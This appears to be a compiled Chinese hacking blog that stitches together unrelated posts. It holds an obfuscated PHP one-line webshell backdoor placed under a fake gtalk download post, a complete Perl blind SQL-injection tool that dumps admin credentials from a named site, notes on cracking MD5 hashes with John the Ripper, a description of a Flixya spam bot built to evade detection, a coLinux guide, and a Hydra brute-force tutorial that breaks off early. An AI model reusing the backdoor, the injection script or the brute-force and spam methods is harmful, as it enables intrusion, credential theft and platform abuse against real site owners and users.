网上找了半天都没找到～～～，有同样想装gtalk的不妨下载安装试试。

下载地址: Talk

<?php
$_=”";
$_[+""]=”;
$_=”$_”.”";
$_=($_[+""]|””).($_[+""]|””).($_[+""]^””);
?>
<?php ${‘_’.$_}['_'](${‘_’.$_}['__']);?>

经过测试发现原来一个数组跟一个字符串连接后会强制把数组转换为字符串”Array”，所以也就有了上面那个一句话后门。
解密一下其实就是这个样子。

<?php
$_=”";            //$_空字符串
$_[+""]=”;        //$_[0]为空字符串
$_=”$_”.”";        //数组跟空字符串连接后(经php强制转换)    变成了字符串”Array” 所以$_[+""]相当于$_[0]=’A’
$_=($_[+""]^””).($_[+""]^””).($_[+""]^””).($_[+""]^””);    //POST
//$_=($_[+""]|””).($_[+""]|””).($_[+""]^””);                    //GET
@${‘_’.$_}['_'](${‘_’.$_}['__']);                                    //$_POST[_]($_POST[__])
?>

#!/usr/bin/perl
# blind access sqlinjector [GET Method]
# for educational purpose only!
# Code by c4rp3nt3r@0x50sec.org
#其实没多大作用

use POSIX;
use LWP::UserAgent;

#######!!!!!!SET THE FOLLOWING TWO LINES
$target ="http://www.cli5.com/exploit.asp?id=111";
$turestr='2011-1-1';
#######!!!!!!

$comstr="";		#%00
$nullstr="+";	#%20 %09 %0a 

print "\n";
print "\t|=-----------------------------------------=|\n";
print "\t|=---[ Blind Access SQL Injector V1.0 ]----=|\n";
print "\t|=-------[ c4rp3nt3r\@0x50sec.org ]---------=|\n";
print "\t|=-----------------------------------------=|\n\n";

main();

sub main
{

	print 'Choose a number to be execute:
	[a] fuzz table_name
	[b] fuzz column_name
	[c] sql (Dump data)
	';
	print "\n";
	print "Choose a number#";
	$xnum= ; chomp $xnum;

	if($xnum eq 'a')
	{
		fuzz_tb();
	}elsif($xnum eq 'b')
	{
		print "Enter The table name to fuzz the column#";
		$sql_stdin= ; chomp $sql_stdin;
		fuzz_pwd_usr_clm($sql_stdin);
	}elsif($xnum eq 'c')
	{
		print "Enter The admin table name#";
		$t_admin = ; chomp $t_admin;
		print "Enter the user column name#";
		$t_user = ; chomp $t_user;
		print "Enter the pass column name#";
		$t_pass = ; chomp $t_pass;
		dump_fuzz_half($t_admin,$t_user,$t_pass);
	}

}

#################
sub fuzz_tb
{
print "[*] Fuzz admin table name...\n";
$xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt(*)'.$nullstr.'fRoM';#.think_md5hash)>0--

#print "$sql\n\007\n";
@ok_tbname=();
$long=@ok_tbname;

#print "[*] Guess table name...\n\n";
@tables=(
'admin',
'admins',
'users',
'user',
'usr_pw',
'salt',
'members',
'mysql.user',
'think_md5hash',
'hash',
'login',
'log_user',
'admin_user',
'adminuser',
'member_admin',
'AdminUsers',
'administrables',
'administrateur',
'administrateurs',
'login_admin',
'login_admins',
'login_user',
'login_users',
'lost_pass',
'lost_passwords',
'lostpass',
'lostpasswords',
'stnuser',
'stuser',
'stusers',
'stuseres',
'staff',
'u_name',
'u_p',
'u_pass',
'Benutzer',
'usercontrol',
'user_pw',
'Benutzerliste',
'userlogins',
'userpasswd',
'admuser',
'system',
'adm',
'tb_user',
'x_admin',
'm_admin',
'manage',
'member',
'tbl_user',
'tbl_users',
'tbl_admin',
'tbl_admins',
'tbl_member',
'tbl_members',
'tbladmins',
'admin_user',
'admin_userinfo',
'administrator',
'adminid',
'admin_id',
'adminuserid',
'admin_userid',
'AdminUID',
'adminusername',
'admin_username',
'adminname',
'admin_name',
'wp_users',
);
	foreach $tbname(@tables)
	{
		$final=$target.$xsql.$nullstr.$tb_prefix.$tbname.')'.$comstr;
		$ua =  new LWP::UserAgent or die;
		$ua->timeout(35);
		$ua->proxy("http", "http://$proxy/") if defined($proxy);
		$tbres = $ua->get($final);
		print "[*] Fuzz table name [$tbname]"."\n";
		#print $final."\n";
		if($tbres->content =~ /$turestr/)
		{
			$result=$result."[+] Found ->".$tbname."\n\n";
			print " \n[+] Found table_name-> [$tbname]"."\n\n";
			$long=@ok_tbname;
			@ok_tbname[$long]=$tbname;	#将存在的表名放到一个数组里
		}
	}

}

sub fuzz_pwd_usr_clm
{
my($xok_tbname)=@_;

##-------
@usrclms=(
'username',
'user_name',
'user',
'login',
'admin',
'adminname',
'admin_id',
'usr',
'name',
'u_name',
'administrators',
'administrator',
'adminuser',
'adminname',
'admin_name',
'admin_user',
'admin_username',
'user_admin',
'user_n',
'user_un',
'user_uname',
'user_username',
'user_usernm',
'user_usernun',
'user_usrnm',
'usr',
'email',
'mail',
'usr_n',
'usr_name',
'usr_pass',
'usr2',
'usrn',
'usrnam',
'usrname',
'usrnm',
'adminusername',
'bbsuser',
'bbsid',
'bbsusername',
'permission',
'access',
'accnt',
'accnts',
'account',
'accounts',
'qq',
'帐号',
'管理员',
'权限',
'用户名',
'会员',
'用户帐号',
);
@pwdclms=(
'password',
'pwd',
'userpass',
'pass',
'psw',
'userpwd',
'userpw',
'psd',
'pw',
'user_pass',
'admin_password',
'PassWD',
'user_password',
'uPassword',
'user_pwd',
'adminpwd',
'admin_pass',
'admin_password',
'login_pass',
'login_passwd',
'login_password',
'login_pw',
'login_pwd',
'login_user',
'login_username',
'adminpsw',
'adminupass',
'user_pass',
'user_passw',
'user_passwd',
'user_pw',
'user_pwd',
'user_pword',
'pword',
'user_pwrd',
'密码',
'用户密码',
'编号',
);

	print "\n[*] Fuzz user column name...\n\n";
	my $ua = new LWP::UserAgent or die;
	$i=0;
	$ua -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920	Firefox/3.0.4");
	foreach $usr_clm(@usrclms)
	{

		$xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt('.$usr_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname.')'.$comstr;#.think_md5hash)>0--
		$final=$target.$xsql;
		$tbres = $ua->get($final);
		print "[*] Fuzz [$usr_clm] from $xok_tbname \n";
		#print $final."\n";
		if($tbres->content =~ /$turestr/)
		{	$result=$result."[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n";
			print "\n[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
			$usr=$usr_clm;
			last;
		}
	}

	print "\n[*] Fuzz password column name...\n\n";
	foreach $pwd_clm(@pwdclms)
	{
		$xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt('.$pwd_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname.')'.$comstr;#.think_md5hash)>0--
		$final=$target.$xsql;

		$tbres = $ua->get($final);
		print "[*] Fuzz [$pwd_clm] from [$xok_tbname] \n";
		#print $final."\n";
		if($tbres->content =~ /$turestr/)
		{	$result=$result."[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n";
			print "\n[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
			$pwd=$pwd_clm;
			last;
		}
	}

	print "[+] Found column_name->"." [$usr] [$pwd] "." from table_name->"."[$xok_tbname]"."\n\n";
}

#################################
sub dump_fuzz_half
{
	$|=1;	# 立即刷新缓冲区输出内容
	my($xok_tbname,$usr,$pwd) = @_; 

	$fuzzsql="seleCt".$nullstr."count(*)".$nullstr.'from'.$nullstr.$xok_tbname;
	print "[*]$fuzzsql:\n";
	$count = fuzz_half($fuzzsql,0,45);
	if($count<=0)
	{
		print "[-]Count(*) of $xok_tbname is less than zero!\n";
		exit;
	}else
	{
		print "[+]Count(*) of $xok_tbname is: [$count]\n";
	}

	$fuzzsql="seleCt".$nullstr.'top'.$nullstr.'1'.$nullstr."len($usr)".$nullstr.'from'.$nullstr.$xok_tbname;
	print "[*]$fuzzsql:\n";
	$len = fuzz_half($fuzzsql,0,45);
	if($len<=0)
	{
		print "[-]Length of top 1 $usr is less than zero!\n";
		exit;
	}else
	{
		print "[+]Length of top 1 $usr is: [$len]\n";
	}
	@okusr=();
	@okpwd=();
	printf("[+]SeleCt top 1 [$usr] from [$xok_tbname]: ");
	for($subset=1;$subset<=$len;$subset++)
	{
		$fuzzsql='seleCt'.$nullstr.'top'.$nullstr.'1'.$nullstr."asc(mid($usr,$subset,1))".$nullstr.'frOm'.$nullstr.$xok_tbname;
		$long=@okusr;
		$ret=fuzz_half($fuzzsql,0,127);
		@okusr[$long]=$ret;
		printf("%c",$ret);
	}
	print "\n[";
	foreach $xoktbnum(@okusr)
	{
		printf("%c",$xoktbnum);
	}
	print "]\n";

	$fuzzsql='seleCt'.$nullstr.'top'.$nullstr.'1'.$nullstr."len($pwd)".$nullstr.'from'.$nullstr.$xok_tbname;
	print "[*]$fuzzsql:\n";
	$len = fuzz_half($fuzzsql,0,45);
	if($len<=0)
	{
		print "[-]Length of top 1 $pwd is less than zero!\n";
		exit;
	}else
	{
		print "[+]Length of top 1 $pwd is: [$len]\n";
	}
	printf("[+]SeleCt top 1 [$pwd] from [$xok_tbname]: ");
	for($subset=1;$subset<=$len;$subset++)
	{
		$fuzzsql='seleCt'.$nullstr.'top'.$nullstr.'1'.$nullstr."asc(mid($pwd,$subset,1))".$nullstr.'frOm'.$nullstr.$xok_tbname;
		$long=@okpwd;
		$ret=fuzz_half($fuzzsql,0,127);
		@okpwd[$long]=$ret;
		printf("%c",$ret);
	}
	print "\n[";

	foreach $xoktbnum(@okpwd)
	{
		printf("%c",$xoktbnum);
	}
	print "]\n\n";
	$fuzzsql="seleCt".$nullstr.'top'.$nullstr.'1'.$nullstr."$usr,$pwd".$nullstr.'from'.$nullstr.$xok_tbname;
	printf "[+]$fuzzsql:\n";
	print "[$usr] : ";
	foreach $xoktbnum(@okusr)
	{
		printf("%c",$xoktbnum);
	}
	print "\n";
	print "[$pwd] : ";
	foreach $xoktbnum(@okpwd)
	{
		printf("%c",$xoktbnum);
	}
	print "\n\n";

}

##################################
sub fuzz_half	#order by语句递归查询函数采用折半法
{
    #($min,$max)区间代表一个范围，正确的字段数在其中我们折半缩小之直到找到正确字段数
    #$min 代表能够正常显示的已经确定的最小整数
    #$max 代表不能够正常显示的已经确定的最小整数，作为我们可以确定的范围的最大数所以叫其"max"
    my ($sql,$min,$max) = @_;
    $x_fuzzsql=$sql;
    if($max==0&&$min==0)
    {
		return 0;
    }
    if($max-$min==1)#如果能正常显示的最小整数比不能正常显示的最小整数大一那么最小的数$min
    {				#就是要找的正确字段数目退出递归函数返回之
    	return $max;
    }
	#如果上面条件没成立就取范围中间的数字作为order by查询字段数
	my $mid=int(($min+$max)/2);#取两个正整数的平均值
	#print "max:$max,min:$min,mid=$mid\n";
	$final=$nullstr."AnD"."($sql)>";
	$final = $target.$final.$mid.$comstr;
	#print "[*] Test ($sql)>$mid...\n";
	#print $final."\n";
	my $lwp = new LWP::UserAgent or die;
	$lwp -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
	my $res = $lwp->get($final);
	my $myres=$res->content; #for test
	if($res->content =~ /$turestr/)
	{
		$min=$mid;
		fuzz_half($sql,$min,$max);
	}
	else
	{
		$max=$mid;
		fuzz_half($sql,$min,$max);
	}
}

可以同时查询google page rank。

#!/usr/bin/perl
# Same IP / Reverse IP Lookup
# Code by c4rp3nt3r#0x50sec.org
#

use POSIX;
use LWP::UserAgent;

$lwp = new LWP::UserAgent or die;

print “\n[*] Same IP / Reverse IP Lookup\n”;
print ‘[*] by c4rp3nt3r@0x50sec.org’.”\n”;

$api = ‘http://sameip.org/ip/’;
$host = $ARGV[0];
$api .= $host;

$res = $lwp->get($api);
$myres=$res->content;
#printf($myres) ; #for test
$i=0;
@hosts=();
$len=@hosts;

#get_pr(‘www.0x50sec.org’);
while($myres =~ /<a\shref=\”http:\/\/(.+?)\”\srel/i)
{
$qq=$&;
$host=$1;
$len=@hosts;
$hosts[$len]=$host;
$myres =~ s/$qq//mg;

}
$len=@hosts;

if($len != 0)
{
# print “[+] Domains Result:\n”;
# for($i=0;$i<$len;$i++)
# {
# print “[$i]\t”.$hosts[$i].”\n”;
# }
print “[+] Google PageRank Result:\n\n”;
for($i=0;$i<$len;$i++)
{
print “[$i]\t”.substr(get_pr($hosts[$i]),0,1).”\t”.$hosts[$i].”\n”;
}

}else
{
print “[-] Result Not Found !\n\n”;
exit;
}

print “\n[+] Found $len Domains! \n\n”;
sub get_pr
{
@suburl= @_;
my $url = $suburl[0];
$prapi=’http://www.0x50sec.org/pr.php?h=’;
$prapi .= $url;
$prlwp = new LWP::UserAgent or die;
$prres = $prlwp->get($prapi);
$pr = $prres->content;
return $pr;
}

From:http://www.disenchant.ch/blog/teaching-john-the-ripper-how-to-crack-md5-hashes/106.html

/*

好强大，还有不能破解的常见密码格式吗～～～

[root@localhost]# ./john
John the Ripper password cracker, version 1.7.3.4-jumbo-1
Copyright (c) 1996-2008 by Solar Designer and others
Homepage: http://www.openwall.com/john/

Usage: john [OPTIONS] [PASSWORD-FILES]
–single                   “single crack” mode
–wordlist=FILE –stdin    wordlist mode, read words from FILE or stdin
–rules                    enable word mangling rules for wordlist mode
–incremental[=MODE]       “incremental” mode [using section MODE]
–markov[=LEVEL[:START:END[:MAXLEN]]] “Markov” mode (see documentation)
–external=MODE            external mode or word filter
–stdout[=LENGTH]          just output candidate passwords [cut at LENGTH]
–restore[=NAME]           restore an interrupted session [called NAME]
–session=NAME             give a new session the NAME
–status[=NAME]            print status of a session [called NAME]
–make-charset=FILE        make a charset, FILE will be overwritten
–show                     show cracked passwords
–test[=TIME]              run tests and benchmarks for TIME seconds each
–users=[-]LOGIN|UID[,..]  [do not] load this (these) user(s) only
–groups=[-]GID[,..]       load users [not] of this (these) group(s) only
–shells=[-]SHELL[,..]     load users with[out] this (these) shell(s) only
–salts=[-]COUNT           load salts with[out] at least COUNT passwords only
–format=NAME              force hash type NAME: DES/BSDI/MD5/BF/AFS/LM/NT/XSHA/PO/raw-MD5/IPB2/raw-sha1/md5a/hmac-md5/KRB5/bfegg/nsldap/ssha/openssha/oracle/MYSQL/mysql-sha1/mscash/lotus5/DOMINOSEC/NETLM/NETNTLM/NETLMv2/NETHALFLM/mssql/mssql05/epi/phps/mysql-fast/pix-md5/sapG/sapB/md5ns/HDAA
–save-memory=LEVEL        enable memory saving, at LEVEL 1..3

*/

Today I was playing around with the well known password cracking tool John the Ripper (JtR) and was looking forward to crack some MD5 hashes. Unfortunately, John still not supports raw-MD5 out of the box and so I was searching the web for a solution. It took me some minutes until I found out, that there are unoficial patches for John’s source code and so I simply patched it and tried to compile. For any reason, I run into problems (doesn’t matter now what problems : ) and even after about half an hour searching the web for a solution I didn’t find anything. Then a few minutes later I found a simple howto for how to patch and compile John so that you won’t have any problems. The site which solved my problem was gurx.net and I couldn’t find it faster because it’s not written in English nor German. Now of course I’ll show you how to do it the gurx.net-way but with support for even many more algorithms than just MD5.

mkdir john
cd john
wget http://www.openwall.com/john/f/john-1.7.2.tar.bz2
tar -xvf john-1.7.2.tar
cd john-1.7.2
wget ftp://ftp.openwall.com/pub/projects/john/contrib/john-1.7.2-all-9.diff.gz
gzip -d john-1.7.2-all-9.diff.gz
patch -p1 < john-1.7.2-all-9.diff.gz
cd src
make
make clean linux-x86-any

Now you can use John out of the “run” directory.

./john -format=raw-MD5 /home/disenchant/md5_hashes_to_crack.txt

raw-MD5 means that you’ve got an input file (/home/disenchant/md5_hashes_to_crack.txt) like the following:

Alice:5f4dcc3b5aa765d61d8327deb882cf99
Bob:1c0b76fce779f78f51be339c49445c49
…

PS: My machine’s a Xubuntu Edgy but this should work with any Linux box ：）

16&&32 Bytes Md5 Hash Online Crack

flixya.com是一个分享视频、图片、文章通过adsense赚美元的一个国外平台。人气还可以，以前玩过后来不玩了，最近又突然想写这么个工具。最后用perl写完了，测试了下每天至少1.5$。觉得实现起来也很简单，网上应该早就有这样的工具。一搜还真有，叫什么flixya超级助手。一看能实现的功能也都实现了。也挺不错。不管怎样通过写这个工具自己那点皮毛的东西也稍微有了点长进。

网上的Flixya超级助手的功能有：
1.自动首页留言，在用户空间首页的评论区留言。
2.自动评论视频，寻找用户上传的视频，并在评论区留言。
3.自动评论相册，寻找用户上传的图片，并在评论区留言。
4.自动评论文章，寻找用户发表的文章，并在评论区留言。
5.自动顶(Hit)视频，寻找用户上传的视频，自动点击(Hit)。
6.自动顶(Hit)图片，寻找用户上传的图片，自动点击(Hit)。
7.自动顶(Hit)文章，寻找用户上传的文章，自动点击(Hit)。
8.自动加用户为好友。
9.自动给用户发送消息。
10.黑名单功能，自动跳过不需要访问的用户空间。
11.智能识别功能，24小时内不会重复给同一个用户发送消息，避免用户误认为你是在发送垃圾消息！
12.自动循环挂机功能，设定在指定的时间内进行无人值守循环挂机操作。
13.支持多用户批量操作，此功能适合你有多个Flixya账户的人。

首页智能评论：Flixya网站规定每个账户每天的首页评论留言数为100，改选项会自动判断您的首页留言功能是否可用，如果您的首页留言数超过100条，就会自动跳过首页留言操作，提高效率！
跳过评论用户：将不需要进行操作的用户加入到列表中，当发现该用户在线后就会自动跳过！

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
以上功能基本上都实现了。
12.条功能没用perl实现，linux下可以用crontab实现，Windows下可以自己写个定时运行的工具。
13.条功能另写了一个文件，但是觉得用处不是很大，因为经过一番评论后自己的photo很容易就上首页popular photo吸引自然流量。

增加的功能有哪些？
1.发送内容的留言、消息、评论内容都随机，尽可能的让工具的留言、消息、评论看起来不像工具。
2.过滤掉某些用户名中含有qq+数字，’zhang’,'liu’,'yang’,'xiao’等等明显中国人的帐号，尽可能的发挥100个首页留言、以及视频、图片、博客100个评论限制的功能。
3.只对当前在线的用户评论，尽可能的发挥100个首页留言限制的功能。
4.对某一个video,photo,blog是否评论和hit都是随机的，防止被flixya.com发现。
5.hit间隔的时间有几秒是随机的，防止被flixya.com发现。
6.防止重复评论功能，检查某视频、图片、博客是否已经评论过了，如果是则跳过。
7.过滤垃圾用户功能。
8.由于首页留言、以及视频、图片、博客都有100个评论限制，所以设置了三个停止标志如果发现达到最大数目自动停止，最大可能的发挥帐号的评论作用。
哪里可以下载？

暂不提供下载，发布的时候会放到www.0x50sec.org .

以下为官方内容！

Metasploit Express is an affordable, easy-to-use penetration testing solution that provides full network penetration testing capabilities, backed by the world’s largest, fully tested and integrated public database of exploits. Built on feedback from the Metasploit user community, key security experts, and Rapid7 customers, Metasploit Express enables organizations to take the next step forward in security.

In addition to the capabilities offered by the open source framework, Metasploit Express goes above and beyond by delivering a full graphical user interface, automated exploitation capabilities, complete user action audit logs, combined with an advanced penetration testing workflow. Metasploit Express is fully supported by Rapid7 security and support specialists in addition to the large and growing Metasploit community.

Key characteristics:

• Complete – full network penetration testing capabilities that not only automated exploits, but also detects and exploits common weaknesses such as simple passwords and insecure configurations
• Easy to use – simple to use GUI interface supported by end-to-end workflow and reports
• Safe – test with confidence with exploit reliability rankings and the ability to throttle speed and concurrency as well as the option to only target safe exploits for risk prioritization
• Integrated – ships with pre-built integration with all versions of the market leading vulnerability management product Rapid7 NeXpose and other solutions
• Supported – backed by Rapid7’s customer support staff with dedicated SLAs for both Metasploit Express and supported components in the Metasploit Framework
• Affordable – available at a price point that a broad range of security professionals in large corporations, consulting organizations, and small business can leverage

我利用Debian Etch定制了一个系统映像。

安装说明：

1、下载coLinux-0.7.1-20070326.exe，安装。
2、下载root.rar,swap.rar和colinux.cfg，放到D:\。解压root.rar和swap.rar，生成root.fs和swap.fs。
3、用以下命令可以启动映像中的Linux系统：
colinux-daemon @D:\colinux.cfg

coLinux使用技巧：
1、把coLinux作为服务启动。
可以进入coLinux的安装目录，然后用以下的命令把coLinux安装为服务：
colinux-daemon –install-service colinux @d:\colinux.cfg

可以在服务管理器把colinux服务社为自动，那么每次启动Windows时自动启动colinux，也可以使用以下命令手动启动:
net start colinux

2、网络设置
在coLinux内访问网络有三种方式：

1) slirp
这是最简单的方式，coLinux作为一个应用程序，直接使用host的网络。而且，也可以把host上的某些端口映射到colinux上。这种方式的缺点是比较慢，而且某些应用无法实现。例子：

eth0=slirp,,tcp:2222:22/tcp:8080:80

2)tuntap
这是通过一个虚拟的网络设备和coLinux通信。例子：

eth0=tuntap

coLinux内需要访问外部网络的时候，可以在真正的网卡上启动Internet Connection Sharing, 也可以建立Bridge Connection，把真正的网卡和虚拟的网卡连接起来。

3)pcap-bridge
这是利用WinPcap来实现的桥连接。首先要安装WinPCap，然后选择某一本地网络设备进行连接，例子：

eth0=pcap-bridge,Local Area Connection

“Local Area Connection”是进行连接的网络设备的名字。

3、cofs
在配置文件里增加这样一行：

cofs0=D:\

在coLinux内可以使用以下的命令

mount -t cofs cofs0 /mnt/d

这样，coLinux里/mnt/d的内容就是host里的D:\。

可以在fstab里增加以下的一项，使得每次启动coLinux时自动装载/mnt/d

cofs0 /mnt/d cofs defaults 0 0

4、利用ssh登陆coLinux系统。

首先，要建立一个普通用户，ssh是不能使用root来登陆的。

并且，coLinux里要使用静态的IP设置，而不是dhcp，网络配置的信息是在/etc/network/interface文件里。例子：

auto eth0
iface eth0 inet static
address 192.168.0.10
gateway 192.168.0.1
netmask 255.255.255.0
network 192.168.0.0
broadcase 192.168.0.255

然后，下载ssh客户端程序，在Windows下可以使用putty。利用putty可以登陆到coLinux系统中。

5、X-Window
在coLinux里也可以运行X-Windows的程序，步骤如下：

1)安装shell:

apt-get install rxvt

当然，这里也可以使用xterm。不过rxvt要小一些。

2)安装X-Window服务器

这里的X-Window服务器是指host里运行的服务器，而不是Linux内的XFree86/X.org服务器。Windows下比较好用的X-Window服务器是XWin32。cygwin里也包含了X-Window服务器，不过我没有使用，不知道效果如何。

3)coLinux内使用静态的IP设置。在这里假设coLinux的IP是192.168.0.10，而tap虚拟网卡的IP是192.168.0.1

4)启动X-Window程序。
可以在coLinux内使用以下命令启动rxvt:

rxvt -ls -display 192.168.0.1:0

如果使用XWin32，还可以建立一个session，在里面填入ssh登陆coLinux的用户，密码和启动命令。这样的话，启动session时就可以直接运行rxvt了。

在rxvt下可以运行其他的X-Window程序。

colinux没有虚拟显卡，实现不了X，但可以通过C/S模式实现。

但后来想了，如果colinux不装X-windows以及桌面，那怎么实现呢？

但是那个ROOT.FS就是装不上X、RXVT，郁闷之极。

重作了个ROOT.FS.咳，真辛苦啊！

按步骤操作（很漫长的，后来才加了个台湾的源才快些）：
apt-get install xorg
dpkg-reconfigure xserver-xorg
apt-get install xfce4
apt-get install vncserver
vncserver :1 -geometry 1024×768 -depth 16

WINDOWS 里面装了个UltraVNC（UltraVNC.sf.org下的），然后连接
debian的IP（192.168.0.2：1，1是刚才在DEBIAN 中设置的端口哦），
天啊，居然成功了，出现了XFCE4的画面。

随后试了下SSH与PUTY的搭配，非常的好啊。字体窗口可以在PUTTY中设置。可以把COLINUX的运行设置成WINDOWS的服务的形式，这样COLINUX用起来就更爽了，连窗口就不要了。

CYGWIN 以及 x-win32还没有试呢。

接上，cygwin,x-win32都是在windows下实现X环境的。cygwin需要安装下载很多东西，配置繁琐；X-WIN32也需要安装重起，并且是商业软件。还有一个XMING需要WIN XP以上系统支持，我用的是2K，没有试用，谁用下说下怎么样。

相比较而言，还是直接在COLINUX制作的LINUX镜像中实现X环境，利用VNC，比较简单、实在。VNC的WIN客户端体积又小，可以免安装。更关键的是，LINUX镜像的X-WINDOWS能够实现在WINDOWS下和直接启动下两用；并且可以实现把这些东西都放在大容量U盘中或移动硬盘中，利用GRUB4DOS和COLINUX稍加配置即随时可实现两用的LINUX，免去硬盘分区安装LINUX的麻烦。

如不要X的话，还是用SSH和PUTTY比较好，或者COLINUX启动时加上“-t nt”在BASH下实现与WINDOWS复制粘贴。

colinux能在WINDOW下安装各种LINUX，它的WIKI介绍的挺详细的。支持各种分区、光驱、ISO镜像文件等,还有COFS及网络。

COLINUX比QEMU、VMWARE来安装LINUX占用的系统资源非常少。对于需要用LINUX又离不开WINDOWS的人来说，以及像我这样刚接触LINUX的人来说真是个不错的选择。

hydra著名黑客组织thc的一款开源的暴力破解工具，其有windows和linux多个平台的版本，本文就是介绍hydra用法的教程。
_ _ _ _
| |_| |__ ___ | |__ _ _ __| |_ __ __ _
| __| ‘_ \ / __|____| ‘_ \| | | |/ _` | ‘__/ _` |
| |_| | | | (_|_____| | | | |_| | (_| | | | (_| |
\__|_| |_|\___| |_| |_|\__, |\__,_|_| \__,_|
|___/ TUTORIAL BASICO THC-HYDRA [PT-BR]
___________________________________________________________________________________
- Por : MDH3LL
- Contato :    mdh3ll@gmail.com
- Data 10/04/2010
__________________________________________________________________________________

INDICE :
___________________________________________________________________________________
-0×00 – Instalando THC-HYDRA no (Windows XP).
-0×01 – Executando.
-0×02 – Opções.
-0×03 – Exemplos{
– Exemplo (1) FTP
– Exemplo (2) http-head
– Exemplo (3) http-post-form
– Exemplo (4) POP3
-0×04 – Proxy.
___________________________________________________________________________________

* THC-Hydra:Open Source/Multiplataforma/
* Desenvolvido por uma organização Alemã chamada “The Hacker’s Choice”(THC).
* O Programa pode ser adquirido gratuitamente no site oficial do projeto : http://freeworld.thc.org/thc-hydra/

Hydra usa um mecanismo de FORÇA BRUTA/BRUTE FORCE (ou busca exaustiva):

Este tipo de ataque consiste em fazer o programa trabalhar exaustivamente tentando combinações de
senhas e nomes de usuários ate chegar ao seu objetivo obvio.

Protocolos suportados atualmente na versão 5.4:
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,
RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,
ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable
===================================================================================
[0x00] Instalando THC-HYDRA no (Windows XP) :
===================================================================================
O Primeiro passo é fazer o download da V.Win32/Cywin do programa no site oficial,descompactar e rodar.

-> Criar uma variável de ambiente em :
painel de controle > sistema > aba avançado > variáveis de ambiente e adicionando o caminho em path.
exemplo: C:\hydra-5.4-win;

===================================================================================
[0x01] Executando :
===================================================================================
Rode ‘hydra’ no prompt de comandos para chamar o programa.

///////////////////////////////////////////////////////////////////////////////////
C:\Documents and Settings\user\Desktop>hydra
Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC <vh@thc.org>

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

Options:
-R        restore a previous aborted/crashed session
-S        connect via SSL
-s PORT   if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS  or -P FILE try password PASS, or load several passwords from FILE
-e ns     additional checks, “n” for null password, “s” try login as pass
-C FILE   colon seperated “login:pass” format, instead of -L/-P options
-M FILE   server list for parallel attacks, one entry per line
-o FILE   write found login/password pairs to FILE instead of stdout
-f        exit after the first found login/password pair (per host if -M)
-t TASKS  run TASKS number of connects in parallel (default: 16)
-w TIME   defines the max wait time in seconds for responses (default: 30)
-v / -V   verbose mode / show login+pass combination for each attempt
server    the target server (use either this OR the -M option)
service   the service to crack. Supported protocols: telnet ftp pop3[-ntlm]
imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco
cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5
rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd
OPT       some service modules need special input (see README!)

Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs – use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at http://www.thc.org
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Podemos ver acima que quando executado exibe informações como versão,sintaxe de uso e
as opções seguidas de comentários.

===================================================================================
[0x02] Opções :
===================================================================================

-R Restaura sessões abordadas/quebradas.
-S Conexão segura usando SSL caso seja necessário.
-s Especifica qual porta o hydra vai estabelecer a conexão.
-l Nome|login da vitima.
-L Carrega uma lista contendo nomes|logins de vitimas.(1 por linha)
-p Especifica senha única.
-P Carrega uma lista com senhas.(1 por linha)
-e ns adcional ‘n’ testa senha em branco || adicional ‘s’ testa user como pass.
-C Usado para carregar um arquivo contendo usuário:senha. formato usuário:senha equivale a -L/-P.
-M Carrega lista de servidores alvos.(1 por linha)
-o Salva as senhas encontradas dentro do arquivo que você especificar.
-f Faz o programa parar de trabalhar quando a senha||usuário for encontrada[o].
-t Limita o numero de solicitações por vez.(default: 16)
-w Define o tempo máximo em segundos para esperar resposta do serv.(default: 30s)
-v / -V Modo verbose do programa. ‘V’ mostra todas tentativas.

Server: Servidor alvo.
Exemplos:
127.0.0.1
localhost
pop.gmail.com
pop.mail.yahoo.com.br
pop3.live.com

Service: Protocolo||Serviço que sera chamado|usado.
Exemplos:
pop3
ftp
smtp
vnc
imap
http-head
http-post-form

===================================================================================
[0x03] Exemplos:
===================================================================================
Colocarei na pratica as opções já explicadas no índice [0x02] deste tutorial.

Exemplo (1) FTP
===================================================================================
Sintaxe:
———————————————————————————–
hydra -l root -P pass.txt -s 21 localhost ftp
———————————————————————————–

Saida:
///////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-08-17 21:23:57
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
